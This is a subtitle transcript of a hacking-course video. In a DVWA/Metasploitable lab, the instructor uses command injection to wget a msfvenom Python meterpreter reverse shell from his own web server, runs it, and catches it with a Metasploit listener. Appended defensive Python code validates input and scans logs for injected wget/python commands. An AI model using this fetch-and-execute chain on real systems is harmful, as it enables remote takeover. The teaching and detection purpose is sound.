1
00:00:00,270 --> 00:00:03,780
Instructor: Okay, so we have covered command injection,

2
00:00:03,780 --> 00:00:06,240
but you can combine this vulnerability

3
00:00:06,240 --> 00:00:08,520
with other tools as well.

4
00:00:08,520 --> 00:00:10,710
For example, in the last video

5
00:00:10,710 --> 00:00:13,860
we managed the established connection using netcat

6
00:00:13,860 --> 00:00:16,140
and the command injection vulnerability.

7
00:00:16,140 --> 00:00:17,460
But we can improve this

8
00:00:17,460 --> 00:00:21,450
by injecting a different payload, such as a meterpreter shell

9
00:00:21,450 --> 00:00:24,990
or a reverse shell that we coded in Python.

10
00:00:24,990 --> 00:00:27,120
The process of doing that is the same.

11
00:00:27,120 --> 00:00:30,270
So I'll show you how to send a meterpreter payload

12
00:00:30,270 --> 00:00:34,740
to the target and make it execute with command injection.

13
00:00:34,740 --> 00:00:36,450
Why would we want to do this?

14
00:00:36,450 --> 00:00:40,200
Well, we always want to have the best payload possible.

15
00:00:40,200 --> 00:00:43,710
So why would we use netcat when meterpreter gives us

16
00:00:43,710 --> 00:00:47,670
a lot more useful options to run on the target system?

17
00:00:47,670 --> 00:00:48,990
And to do all of that,

18
00:00:48,990 --> 00:00:51,810
here are the steps that we must perform.

19
00:00:51,810 --> 00:00:55,770
We must first create the payload appropriate for our target.

20
00:00:55,770 --> 00:00:59,610
Then we must download that payload to our target machine

21
00:00:59,610 --> 00:01:02,310
with the help of the command injection vulnerability.

22
00:01:02,310 --> 00:01:06,330
And at last, we must execute that payload, also

23
00:01:06,330 --> 00:01:09,480
with the help of the command injection vulnerability.

24
00:01:09,480 --> 00:01:12,030
So, sounds pretty simple, right?

25
00:01:12,030 --> 00:01:15,420
Let's figure out what payload we should create first.
26
00:01:15,420 --> 00:01:17,670
So to create the payload, we need to figure out

27
00:01:17,670 --> 00:01:20,220
what we know about our target.

28
00:01:20,220 --> 00:01:24,900
Well, we know that Metasploitable is a Linux 32-bit machine,

29
00:01:24,900 --> 00:01:28,260
so we can create a Linux meterpreter payload.

30
00:01:28,260 --> 00:01:32,190
But for this case I like the Python payload a lot better.

31
00:01:32,190 --> 00:01:35,373
So let's create a Python meterpreter shell.

32
00:01:36,270 --> 00:01:38,100
The great thing about Linux systems

33
00:01:38,100 --> 00:01:40,290
is that they come with Python by default.

34
00:01:40,290 --> 00:01:42,510
So a Python payload is something that

35
00:01:42,510 --> 00:01:44,520
we can execute on our target

36
00:01:44,520 --> 00:01:48,060
without them having to install any additional software.

37
00:01:48,060 --> 00:01:49,950
Let's create it real quick.

38
00:01:49,950 --> 00:01:52,410
So I will navigate to my desktop directory

39
00:01:52,410 --> 00:01:54,070
and here I will type msfvenom -p

40
00:01:56,190 --> 00:01:57,690
and that will specify that we want

41
00:01:57,690 --> 00:02:02,690
to create python/meterpreter/reverse_tcp.

42
00:02:04,230 --> 00:02:07,320
The LHOST is going to be our IP address.

43
00:02:07,320 --> 00:02:10,203
So let's check it out real quick.

44
00:02:12,420 --> 00:02:17,420
It is 192.168.1.9; copy it and paste it right here.

45
00:02:19,020 --> 00:02:20,220
For the LPORT,

46
00:02:20,220 --> 00:02:23,340
we can use port 6000, for example,

47
00:02:23,340 --> 00:02:27,780
and we are going to output this with a > arrow

48
00:02:27,780 --> 00:02:30,210
into tester.py.

49
00:02:30,210 --> 00:02:31,890
And I just named the payload tester,

50
00:02:31,890 --> 00:02:35,370
but feel free to name it anything that you want.

51
00:02:35,370 --> 00:02:36,840
I will press enter here

52
00:02:36,840 --> 00:02:39,183
and this will create our Python payload.
53
00:02:40,050 --> 00:02:42,600
Let me go right here, lower this,

54
00:02:42,600 --> 00:02:44,100
and while this is creating,

55
00:02:44,100 --> 00:02:46,890
make sure that your Burp Suite is started up.

56
00:02:46,890 --> 00:02:49,860
Also make sure that your intercept is turned off,

57
00:02:49,860 --> 00:02:52,830
and start up your Firefox

58
00:02:52,830 --> 00:02:57,120
and your Metasploitable virtual machine. Okay?

59
00:02:57,120 --> 00:03:00,240
So once you do that, here in just a few seconds

60
00:03:00,240 --> 00:03:01,983
our payload should be done.

61
00:03:02,940 --> 00:03:04,290
And here it is.

62
00:03:04,290 --> 00:03:06,960
Now that we have a payload created, we must figure out

63
00:03:06,960 --> 00:03:09,990
how we can deliver it to the target system.

64
00:03:09,990 --> 00:03:12,900
Of course, we will do that using the command injection,

65
00:03:12,900 --> 00:03:15,147
but even then the target must be able

66
00:03:15,147 --> 00:03:18,840
to download our payload from somewhere, right?

67
00:03:18,840 --> 00:03:21,636
For this, we're going to use the apache2 web server

68
00:03:21,636 --> 00:03:24,780
and host our payload there.

69
00:03:24,780 --> 00:03:26,700
Apache comes with Kali Linux already,

70
00:03:26,700 --> 00:03:29,460
so we can make it run real quick.

71
00:03:29,460 --> 00:03:31,770
To do that, we must first type sudo

72
00:03:31,770 --> 00:03:36,150
and then service apache2 start.

73
00:03:36,150 --> 00:03:37,980
It will ask us for the password.

74
00:03:37,980 --> 00:03:39,330
We input the password

75
00:03:39,330 --> 00:03:42,630
and this will start our apache2 web server.

76
00:03:42,630 --> 00:03:43,650
What does this mean?
77
00:03:43,650 --> 00:03:46,710
Well, this means that any file that is hosted inside

78
00:03:46,710 --> 00:03:50,220
of the /var/www/html directory

79
00:03:50,220 --> 00:03:53,250
in our Kali Linux will be hosted on our web page

80
00:03:53,250 --> 00:03:56,220
to anyone that visits our IP address.

81
00:03:56,220 --> 00:03:59,940
Let's first of all visit that directory.

82
00:03:59,940 --> 00:04:04,940
So I go cd /var/www/html and type ls here,

83
00:04:04,980 --> 00:04:07,950
and we got shell.exe from some previous video,

84
00:04:07,950 --> 00:04:09,933
which we can delete straight away.

85
00:04:11,130 --> 00:04:13,860
And this might require root privileges.

86
00:04:13,860 --> 00:04:17,700
So let us just enter the root account, sudo su,

87
00:04:17,700 --> 00:04:21,180
and let's delete this shell.exe.

88
00:04:21,180 --> 00:04:23,430
And now our directory is empty,

89
00:04:23,430 --> 00:04:26,640
so no files are being hosted on our web server.

90
00:04:26,640 --> 00:04:28,110
Let's copy our tester,

91
00:04:28,110 --> 00:04:30,450
which in my case is in my home directory,

92
00:04:30,450 --> 00:04:33,390
mr hacker, and Desktop, tester.py.

93
00:04:33,390 --> 00:04:38,193
And we want to copy it inside of /var/www/html.

94
00:04:39,810 --> 00:04:42,780
And now if we were to go to our Kali Linux machine

95
00:04:42,780 --> 00:04:46,050
and visit the IP address of my Kali Linux,

96
00:04:46,050 --> 00:04:51,050
which is 192.168.1.9, we are going to see this page

97
00:04:51,270 --> 00:04:54,570
that has this file available to download.

98
00:04:54,570 --> 00:04:56,970
Great. All we are left to do right now

99
00:04:56,970 --> 00:05:00,360
is to execute this file on the target system.

100
00:05:00,360 --> 00:05:02,580
Let's go to our command injection page

101
00:05:02,580 --> 00:05:04,323
on our Metasploitable.

102
00:05:05,460 --> 00:05:08,430
And to do that we visit the IP address of Metasploitable

103
00:05:08,430 --> 00:05:09,960
and navigate to DVWA.
104
00:05:09,960 --> 00:05:14,400
All of this we already know. Let us enter the username

105
00:05:14,400 --> 00:05:16,830
and password and go to the command injection.

106
00:05:16,830 --> 00:05:18,210
But before we do that,

107
00:05:18,210 --> 00:05:21,693
change the security level to either low or medium.

108
00:05:22,950 --> 00:05:25,890
Once we do that, inside of the command injection

109
00:05:25,890 --> 00:05:29,430
we can execute the commands as in the previous video.

110
00:05:29,430 --> 00:05:33,780
So if I type right here 192.168.1.1

111
00:05:33,780 --> 00:05:37,740
and dot and comma and then ls after it,

112
00:05:37,740 --> 00:05:39,900
it'll ping the router's IP address

113
00:05:39,900 --> 00:05:43,560
and it'll also print out the contents of that directory.

114
00:05:43,560 --> 00:05:45,480
But we don't want to ping every time.

115
00:05:45,480 --> 00:05:47,940
We can just type dot and comma, which will specify

116
00:05:47,940 --> 00:05:49,590
that we want to enter a next command,

117
00:05:49,590 --> 00:05:51,690
and we can just type ls after it.

118
00:05:51,690 --> 00:05:55,080
And this will just give us the output of the ls command

119
00:05:55,080 --> 00:05:58,530
and we won't have to wait for the ping command to finish.

120
00:05:58,530 --> 00:06:02,460
Now, let's download our payload using the wget command,

121
00:06:02,460 --> 00:06:04,350
and wget is something that you can run

122
00:06:04,350 --> 00:06:07,161
from a terminal in order to download a specific file

123
00:06:07,161 --> 00:06:10,560
from the page or link that you specify.

124
00:06:10,560 --> 00:06:13,290
Let me show you inside of the terminal first.

125
00:06:13,290 --> 00:06:15,300
So right now I am inside

126
00:06:15,300 --> 00:06:18,630
of the slash home slash mr hacker directory.
127
00:06:18,630 --> 00:06:21,600
And I don't have the tester.py right here,

128
00:06:21,600 --> 00:06:23,790
but if I run the command wget

129
00:06:23,790 --> 00:06:27,390
and then 192.168.1.9, which is the IP address

130
00:06:27,390 --> 00:06:31,140
of Kali Linux, slash, and then tester.py.

131
00:06:31,140 --> 00:06:34,800
With this link, we are accessing this page right here

132
00:06:34,800 --> 00:06:37,020
and this file right here,

133
00:06:37,020 --> 00:06:39,690
which will tell our terminal that we want

134
00:06:39,690 --> 00:06:41,370
to download that file.

135
00:06:41,370 --> 00:06:44,610
If I press enter, it'll download tester.py,

136
00:06:44,610 --> 00:06:46,980
and if I type ls once again,

137
00:06:46,980 --> 00:06:49,980
now we have tester.py inside of our home

138
00:06:49,980 --> 00:06:52,350
and mr hacker directory.

139
00:06:52,350 --> 00:06:56,820
We want to do the same thing on our target machine.

140
00:06:56,820 --> 00:06:59,040
So to do that we can use dot and comma

141
00:06:59,040 --> 00:07:01,710
to specify the next command and type the same command,

142
00:07:01,710 --> 00:07:06,710
wget 192.168.1.9/tester.py.

143
00:07:09,630 --> 00:07:11,640
I press submit.

144
00:07:11,640 --> 00:07:15,060
And if I run the ls command once again,

145
00:07:15,060 --> 00:07:18,753
now we have one additional file, which is our payload.

146
00:07:19,770 --> 00:07:23,103
So it is there, it is on the target machine right now

147
00:07:23,103 --> 00:07:24,903
with the help of command injection.

148
00:07:25,800 --> 00:07:28,230
The last step we have to do is to set up

149
00:07:28,230 --> 00:07:30,630
a listener inside of msfconsole.

150
00:07:30,630 --> 00:07:32,493
So let's do that real quick.

151
00:07:33,840 --> 00:07:37,533
And after we set up a listener, we must execute our payload.

152
00:07:38,520 --> 00:07:39,870
And here is the msfconsole.

153
00:07:39,870 --> 00:07:42,690
We are already familiar with setting up the listener.
154
00:07:42,690 --> 00:07:45,120
We are going to use exploit/multi/handler

155
00:07:45,120 --> 00:07:48,750
and we need to set the payload to be

156
00:07:48,750 --> 00:07:52,920
python/meterpreter/reverse_tcp.

157
00:07:56,730 --> 00:07:59,670
If I show options, all we want to do is set

158
00:07:59,670 --> 00:08:02,700
the LHOST and LPORT, and that will be the IP address

159
00:08:02,700 --> 00:08:06,810
of Kali Linux, and the LPORT will be 6000,

160
00:08:06,810 --> 00:08:10,200
the same options that we specified inside of msfvenom.

161
00:08:10,200 --> 00:08:11,340
Why not?

162
00:08:11,340 --> 00:08:14,790
Then I will run this, and all we are left to do right now

163
00:08:14,790 --> 00:08:17,040
is to execute this tester.py

164
00:08:17,040 --> 00:08:18,630
with the help of command injection.

165
00:08:18,630 --> 00:08:20,610
So let's see how we can do that.

166
00:08:20,610 --> 00:08:25,610
If I type dot and comma and python tester.py, press enter,

167
00:08:28,440 --> 00:08:30,330
this page will load.

168
00:08:30,330 --> 00:08:33,120
And this is good news, because that would most likely mean

169
00:08:33,120 --> 00:08:35,850
that we got the meterpreter shell opened.

170
00:08:35,850 --> 00:08:39,000
With the help of Python, we executed our Python program

171
00:08:39,000 --> 00:08:43,020
on the target machine and it opened our meterpreter shell,

172
00:08:43,020 --> 00:08:45,390
where we can execute various commands.

173
00:08:45,390 --> 00:08:47,610
As usual, we can run the help command

174
00:08:47,610 --> 00:08:49,920
to see what else we can execute,

175
00:08:49,920 --> 00:08:53,040
and we can basically perform the post exploitation

176
00:08:53,040 --> 00:08:54,750
that we already covered.

177
00:08:54,750 --> 00:08:56,520
Great.
So this is just another way

178
00:08:56,520 --> 00:08:58,350
that you can use command injection

179
00:08:58,350 --> 00:09:00,960
to your advantage to spawn a better payload

180
00:09:00,960 --> 00:09:04,500
than just a simple netcat command execution.

181
00:09:04,500 --> 00:09:05,910
So you can try to test this

182
00:09:05,910 --> 00:09:08,970
with our Python payload if you want.

183
00:09:08,970 --> 00:09:12,180
Great. Now that we covered the command injection vulnerability,

184
00:09:12,180 --> 00:09:14,250
in the next video we're going to go

185
00:09:14,250 --> 00:09:16,830
into the cross-site scripting vulnerability.

186
00:09:16,830 --> 00:09:18,183
See you there.
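The video shows the attacker's side of a DVWA-style "ping a host" form: the submitted value is spliced into a shell command, so a separator plus wget or python runs extra commands. Below is an added example from the defender's side, not code from the course, DVWA or Metasploit. It assumes a form parameter named `ip` (as on the DVWA command injection page) and uses constructed Apache-style access log lines, not logs from the video. The first half is the hardened handler: the value must parse as a literal IP address and is passed to ping as its own argv element, never through a shell. The second half is a small log scanner that flags requests whose `ip` value carries shell metacharacters, and separately those that also name a download or interpreter tool, which is the pattern the video demonstrates.

```python
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# ---- Mitigation: a hardened "ping" handler -------------------------------
# The vulnerable pattern wraps the raw form value in a shell string, e.g.
# "ping -c 4 " + user_value, so "192.168.1.1;ls" runs a second command.
# This handler rejects anything that is not a bare IP address and never
# invokes a shell, so metacharacters have no meaning even if they got through.

def parse_target_ip(user_value: str) -> str:
    """Return a normalised IP string, or raise ValueError for anything else."""
    # ipaddress.ip_address() raises on ';', '|', '&', hostnames, spaces, etc.
    return str(ipaddress.ip_address(user_value.strip()))

def build_ping_argv(user_value: str, count: int = 4) -> list:
    """Build the ping command as an argv list; no shell ever parses it."""
    return ["ping", "-c", str(count), parse_target_ip(user_value)]

def run_ping(user_value: str) -> str:
    """Validate, then run ping without shell=True. Raises ValueError on bad input."""
    argv = build_ping_argv(user_value)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout + proc.stderr

# ---- Detection: flag injection attempts in web access logs ---------------
# Constructed sample lines (Apache combined-style); the paths and values are
# invented for this example and only mirror the request shapes the video shows.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/exec/?ip=192.168.1.1&Submit=Submit HTTP/1.1" 200 1234
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /dvwa/vulnerabilities/exec/?ip=192.168.1.1%3Bls&Submit=Submit HTTP/1.1" 200 1536
10.0.0.5 - - [01/Jan/2024:10:00:19 +0000] "GET /dvwa/vulnerabilities/exec/?ip=%3Bwget+192.168.1.9%2Ftester.py&Submit=Submit HTTP/1.1" 200 1301
10.0.0.5 - - [01/Jan/2024:10:00:31 +0000] "GET /dvwa/vulnerabilities/exec/?ip=%3Bpython+tester.py&Submit=Submit HTTP/1.1" 200 1290
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell separators and substitution that turn one command into several.
SHELL_META = re.compile(r"[;|&`$\n]")
# Tools that, following a separator, indicate staging or execution of a payload.
TOOLING = re.compile(r"\b(wget|curl|nc|ncat|python\d?|perl|bash|sh)\b")

def classify_ip_param(path: str) -> str:
    """Classify the 'ip' query value of one request path."""
    query = urlsplit(path).query
    params = parse_qs(query, keep_blank_values=True)   # percent-decodes values
    value = params.get("ip", [""])[0]
    try:
        parse_target_ip(value)
        return "benign"
    except ValueError:
        pass
    if SHELL_META.search(value):
        return "injection-with-tooling" if TOOLING.search(value) else "injection"
    return "malformed"

def scan_log(text: str) -> list:
    """Return (source, timestamp, verdict, decoded ip value) for suspicious lines."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_ip_param(m["path"])
        if verdict != "benign":
            value = parse_qs(urlsplit(m["path"]).query).get("ip", [""])[0]
            findings.append((m["src"], m["ts"], verdict, value))
    return findings

if __name__ == "__main__":
    print(build_ping_argv("192.168.1.1"))
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The scanner deliberately distinguishes a bare separator (`;ls`) from separator plus tooling (`;wget …`, `;python …`): the former shows probing, the latter shows the staging-and-execute sequence from the video and deserves a higher alert priority. On the mitigation side, the key point is that validation and the absence of a shell are two independent layers; either alone would have stopped the injected `wget` and `python` commands, and together they also cover the medium-level DVWA filter bypasses the video alludes to.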